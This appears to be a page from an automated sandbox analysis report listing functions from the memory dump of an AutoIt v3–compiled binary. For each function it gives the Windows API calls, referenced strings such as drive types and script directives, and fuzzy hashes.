Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: 69C1A5F22052D34AEB2D463984344FFBEA25AA27B131A076DD4B3CF6C5EE24D5A4D710

Function 006B0A8F Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 7edd7762e73acc29a722528af353bb54b6e70fb6ee2e55c6daf9e26c8a79d875
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: B6C1B2B22052D349EF2D463984344FFBFA25AA27B531A4B6DD4B3CB2C1EE24D5A4C710

Function 006B0677 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 52b6f71a1e322247fa341e9a8cf784392ec3ac3dcbad4db9242ff9922b25fe9b
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 24C1C2B22052D349FF2D463984344FFBFA25AA17B131A576DD4B2CB2C2EE24D5A4C720

Function 006FD095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 006FD0EB
GetSysColorBrush.USER32(0000000F), ref: 006FD11C
GetSysColor.USER32(0000000F), ref: 006FD128
SetBkColor.GDI32(?,000000FF), ref: 006FD142
SelectObject.GDI32(?,00000000), ref: 006FD151
InflateRect.USER32(?,000000FF,000000FF), ref: 006FD17C
GetSysColor.USER32(00000010), ref: 006FD184
CreateSolidBrush.GDI32(00000000), ref: 006FD18B
FrameRect.USER32(?,?,00000000), ref: 006FD19A
DeleteObject.GDI32(00000000), ref: 006FD1A1
InflateRect.USER32(?,000000FE,000000FE), ref: 006FD1EC
FillRect.USER32(?,?,00000000), ref: 006FD21E
GetWindowLongW.USER32(?,000000F0), ref: 006FD249

Part of subcall function 006FD385: GetSysColor.USER32(00000012), ref: 006FD3BE
Part of subcall function 006FD385: SetTextColor.GDI32(?,?), ref: 006FD3C2
Part of subcall function 006FD385: GetSysColorBrush.USER32(0000000F), ref: 006FD3D8
Part of subcall function 006FD385: GetSysColor.USER32(0000000F), ref: 006FD3E3
Part of subcall function 006FD385: GetSysColor.USER32(00000011), ref: 006FD400
Part of subcall function 006FD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 006FD40E
Part of subcall function 006FD385: SelectObject.GDI32(?,00000000), ref: 006FD41F
Part of subcall function 006FD385: SetBkColor.GDI32(?,00000000), ref: 006FD428
Part of subcall function 006FD385: SelectObject.GDI32(?,?), ref: 006FD435
Part of subcall function 006FD385: InflateRect.USER32(?,000000FF,000000FF), ref: 006FD454
Part of subcall function 006FD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006FD46B
Part of subcall function 006FD385: GetWindowLongW.USER32(00000000,000000F0), ref: 006FD480
Part of subcall function 006FD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006FD4A8

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 2b06e1bec5b6a857c0cabfc3123cc8f5236eacdca543d284a7fcfc0f99bfb337
Instruction ID: f56f9dbc5704960fd27d58b0eda7a985a990dba921e8bfbefb4956d71595498e
Opcode Fuzzy Hash: 2b06e1bec5b6a857c0cabfc3123cc8f5236eacdca543d284a7fcfc0f99bfb337
Instruction Fuzzy Hash: 6F918072008305BFD7209F68DC08EAB7BAAFB85321F108A19F662961E0D779E944CF55

Function 006EA3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 006EA42A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006EA4E9
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 006EA527
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 006EA539
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 006EA57F
GetClientRect.USER32(00000000,?), ref: 006EA58B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 006EA5CF
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006EA5DE
GetStockObject.GDI32(00000011), ref: 006EA5EE
SelectObject.GDI32(00000000,00000000), ref: 006EA5F2
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 006EA602
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006EA60B
DeleteDC.GDI32(00000000), ref: 006EA614
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006EA642
SendMessageW.USER32(00000030,00000000,00000001), ref: 006EA659
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 006EA694
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 006EA6A8
SendMessageW.USER32(00000404,00000001,00000000), ref: 006EA6B9
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 006EA6E9
GetStockObject.GDI32(00000011), ref: 006EA6F4
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006EA6FF
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 006EA709

Strings

AutoIt v3, xrefs: 006EA577
msctls_progress32, xrefs: 006EA68A
DISPLAY, xrefs: 006EA5D4
static, xrefs: 006EA5C9, 006EA6E3

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 511e0d238e9f528839947a3acb612d0ee6950d52d4bb970b62f6d5412d0e111d
Instruction ID: 8713542e8e492e7f646401255081ef6958a04896f078ba4c9de3936571673171
Opcode Fuzzy Hash: 511e0d238e9f528839947a3acb612d0ee6950d52d4bb970b62f6d5412d0e111d
Instruction Fuzzy Hash: E3A14D71A40215BFEB14DBA9DC49FEA7BBAEB04711F008114F614AB2E0D7B4AD00CF68

Function 006DE44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 006DE45E
GetDriveTypeW.KERNEL32(?,0072DC88,?,\\.\,0072DBF0), ref: 006DE54B
SetErrorMode.KERNEL32(00000000,0072DC88,?,\\.\,0072DBF0), ref: 006DE6B1

Strings

Fibre, xrefs: 006DE63E
1394, xrefs: 006DE630
Virtual, xrefs: 006DE676
SATA, xrefs: 006DE661
RAMDisk, xrefs: 006DE575
FileBackedVirtual, xrefs: 006DE67D
CDROM, xrefs: 006DE57F
\\.\, xrefs: 006DE4B3
MMC, xrefs: 006DE66F
SSA, xrefs: 006DE637
SCSI, xrefs: 006DE61B
SSD, xrefs: 006DE5D8
PhysicalDrive, xrefs: 006DE4EF
iSCSI, xrefs: 006DE653
RAID, xrefs: 006DE64C
Removable, xrefs: 006DE59D
USB, xrefs: 006DE645
ATAPI, xrefs: 006DE622
Fixed, xrefs: 006DE593
SAS, xrefs: 006DE65A
Unknown, xrefs: 006DE56B, 006DE614
Network, xrefs: 006DE589
ATA, xrefs: 006DE629

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 89651550c1e45692999f6026ca26897ad1ca3de41322be1e4eb53c4a2ee01a34
Instruction ID: 44e7cd2adf0dc7f8bde27fddcd2dbb8c9cdc6fb79354998353544198fc70491d
Opcode Fuzzy Hash: 89651550c1e45692999f6026ca26897ad1ca3de41322be1e4eb53c4a2ee01a34
Instruction Fuzzy Hash: 90510470A48341EBC600FF14C8D1869B7A3BBA6744B20891FF44AAF3D1D726DE42DB56

Function 0069C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0069C741
__wcsnicmp.LIBCMT ref: 0069C759
__wcsnicmp.LIBCMT ref: 0069C771
__wcsnicmp.LIBCMT ref: 0069C789
__wcsnicmp.LIBCMT ref: 0069C7A1
__wcsnicmp.LIBCMT ref: 0069C7B5
__wcsnicmp.LIBCMT ref: 0069C7C9
__wcsnicmp.LIBCMT ref: 0069C7E1
__wcsnicmp.LIBCMT ref: 0069C8B2
__wcsnicmp.LIBCMT ref: 0069C8C6
__wcsnicmp.LIBCMT ref: 0069C8DA
__wcsnicmp.LIBCMT ref: 0069C8EE

Strings

#ce, xrefs: 0069C8E8
#comments-start, xrefs: 0069C7C3, 0069C8AC
Unterminated group of comments, xrefs: 00703475
#comments-end, xrefs: 0069C8D4
Cannot parse #include, xrefs: 00703482
#pragma compile, xrefs: 0069C73B
Bad directive syntax error, xrefs: 0070346D
#cs, xrefs: 0069C7DB, 0069C8C0
#OnAutoItStartRegister, xrefs: 0069C783
#requireadmin, xrefs: 0069C76B
#include, xrefs: 0069C7AF
#notrayicon, xrefs: 0069C753
#include-once, xrefs: 0069C79B

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 7d01b68f323baf2561202dbd6bd3ef1e471a813b7876e3b73fd5a40a8282ee63
Instruction ID: 584882f84ec13c87b33e3cb0363cef746e863b76a14d6698cf6e6065f599a2c9
Opcode Fuzzy Hash: 7d01b68f323baf2561202dbd6bd3ef1e471a813b7876e3b73fd5a40a8282ee63
Instruction Fuzzy Hash: 3F613BB1640312BBDF21EA64DC52FFA33DEAF15350F140029F846AA9C6EB94DE41C7A5

Function 006948C8 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00694956
DeleteObject.GDI32(00000000), ref: 00694998
DeleteObject.GDI32(00000000), ref: 006949A3
DestroyCursor.USER32(00000000), ref: 006949AE
DestroyWindow.USER32(00000000), ref: 006949B9
SendMessageW.USER32(?,00001308,?,00000000), ref: 0070E179
6FB20200.COMCTL32(?,000000FF,?), ref: 0070E1B2
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0070E5E0

Part of subcall function 006949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00694954,00000000), ref: 00694A23

SendMessageW.USER32 ref: 0070E627
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0070E63E

Strings

0, xrefs: 0070E474

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: DestroyMessageSendWindow$DeleteObject$B20200CursorInvalidateMoveRect
String ID: 0
API String ID: 2034900625-4108050209
Opcode ID: 4327b1eea0e9d8cd72de24a96cb3e5b1ac68252f0b3658a3a9b0e34830c86c43
Instruction ID: bf05549a07c37d7036320114865819bd551afd45292ea2d3b756bc1dacd5a96a
Opcode Fuzzy Hash: 4327b1eea0e9d8cd72de24a96cb3e5b1ac68252f0b3658a3a9b0e34830c86c43
Instruction Fuzzy Hash: CA129230504601DFDB24CF18C984BAABBE5BF44305F148A69F999CB6A2CB35EC56CF91

Function 006FC4F9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 006FC598
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 006FC64E
SendMessageW.USER32(?,00001102,00000002,?), ref: 006FC669
SendMessageW.USER32(?,000000F1,?,00000000), ref: 006FC925

Strings

0, xrefs: 006FC6AC

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 317b94389411b04bd1665208c7883b1a2081cd312b37840a689e9301c38384d2
Instruction ID: c2d51fe250df13464c20c4b18096c1d04fc2ba91a905eee4b110dff9b256ed58
Opcode Fuzzy Hash: 317b94389411b04bd1665208c7883b1a2081cd312b37840a689e9301c38384d2
Instruction Fuzzy Hash: EEF1D17110830DAFE7218F28CA85BFABBE6FF89364F084529F694962A1C774D844DB51

Function 006F6189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0072DBF0), ref: 006F6245

Strings

EDITPASTE, xrefs: 006F6557
ISCHECKED, xrefs: 006F6455
ISENABLED, xrefs: 006F6288
SHOWDROPDOWN, xrefs: 006F62FC
CURRENTTAB, xrefs: 006F62D9
GETLINE, xrefs: 006F6587
DELSTRING, xrefs: 006F6365
GETCURRENTCOL, xrefs: 006F6520
GETCURRENTLINE, xrefs: 006F6500
GETCURRENTSELECTION, xrefs: 006F63FF
UNCHECK, xrefs: 006F649D
TABRIGHT, xrefs: 006F62B9
ISVISIBLE, xrefs: 006F6251
GETSELECTED, xrefs: 006F64BD
TABLEFT, xrefs: 006F62A3
HIDEDROPDOWN, xrefs: 006F631C
GETLINECOUNT, xrefs: 006F64E0
SENDCOMMANDID, xrefs: 006F65C6
SELECTSTRING, xrefs: 006F6422
SETCURRENTSELECTION, xrefs: 006F63D2
CHECK, xrefs: 006F6487
ADDSTRING, xrefs: 006F6332
FINDSTRING, xrefs: 006F6392

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 774c6be0ce133dbd574e098b70f5de788430741eca5f5fc682579b676bfef03f
Instruction ID: a816fb18922e57f61dd012c468c5f48626c64acee8ce4b2353c70ea47122ede3
Opcode Fuzzy Hash: 774c6be0ce133dbd574e098b70f5de788430741eca5f5fc682579b676bfef03f
Instruction Fuzzy Hash: 7DC192302042058BCB44FF14C451BBE77E7AF953A4F04886DF9869B796CB25ED0ACB86

Function 006FD385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 006FD3BE
SetTextColor.GDI32(?,?), ref: 006FD3C2
GetSysColorBrush.USER32(0000000F), ref: 006FD3D8
GetSysColor.USER32(0000000F), ref: 006FD3E3
CreateSolidBrush.GDI32(?), ref: 006FD3E8
GetSysColor.USER32(00000011), ref: 006FD400
CreatePen.GDI32(00000000,00000001,00743C00), ref: 006FD40E
SelectObject.GDI32(?,00000000), ref: 006FD41F
SetBkColor.GDI32(?,00000000), ref: 006FD428
SelectObject.GDI32(?,?), ref: 006FD435
InflateRect.USER32(?,000000FF,000000FF), ref: 006FD454
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006FD46B
GetWindowLongW.USER32(00000000,000000F0), ref: 006FD480
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006FD4A8
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 006FD4CF
InflateRect.USER32(?,000000FD,000000FD), ref: 006FD4ED
DrawFocusRect.USER32(?,?), ref: 006FD4F8
GetSysColor.USER32(00000011), ref: 006FD506
SetTextColor.GDI32(?,00000000), ref: 006FD50E
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 006FD522
SelectObject.GDI32(?,006FD0B5), ref: 006FD539
DeleteObject.GDI32(?), ref: 006FD544
SelectObject.GDI32(?,?), ref: 006FD54A
DeleteObject.GDI32(?), ref: 006FD54F
SetTextColor.GDI32(?,?), ref: 006FD555
SetBkColor.GDI32(?,?), ref: 006FD55F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 03d275ac4160a2635fc4e97d8a0cffeeb0dc2c5d8aaee1ea5aea53aa78978e67
Instruction ID: 029bcd8f32e25bf1e479dac3f8f729e6040c240f19af9a8d51bfff624d4c957c
Opcode Fuzzy Hash: 03d275ac4160a2635fc4e97d8a0cffeeb0dc2c5d8aaee1ea5aea53aa78978e67
Instruction Fuzzy Hash: CF511D72900218BFDB109FA8DC48EEE7BBAEB48320F118515FA15AB2E1D775AD409F54

Function 006FB4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 006FB5C0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006FB5D1
CharNextW.USER32(0000014E), ref: 006FB600
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 006FB641
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 006FB657
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006FB668
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 006FB685
SetWindowTextW.USER32(?,0000014E), ref: 006FB6D7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 006FB6ED
SendMessageW.USER32(?,00001002,00000000,?), ref: 006FB71E
_memset.LIBCMT ref: 006FB743
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 006FB78C
_memset.LIBCMT ref: 006FB7EB
SendMessageW.USER32 ref: 006FB815
SendMessageW.USER32(?,00001074,?,00000001), ref: 006FB86D
SendMessageW.USER32(?,0000133D,?,?), ref: 006FB91A
InvalidateRect.USER32(?,00000000,00000001), ref: 006FB93C
GetMenuItemInfoW.USER32(?), ref: 006FB986
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006FB9B3
DrawMenuBar.USER32(?), ref: 006FB9C2
SetWindowTextW.USER32(?,0000014E), ref: 006FB9EA

Strings

0, xrefs: 006FB95F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: a592f9f2d22d1bc01886aaf2556023d04789d3aaa3dbb604d7a3560acd3ccf0e
Instruction ID: 84b15e25ebec87affb75ef962d354b33ad1907d5fd1392a7aa07aaaf7a62a979
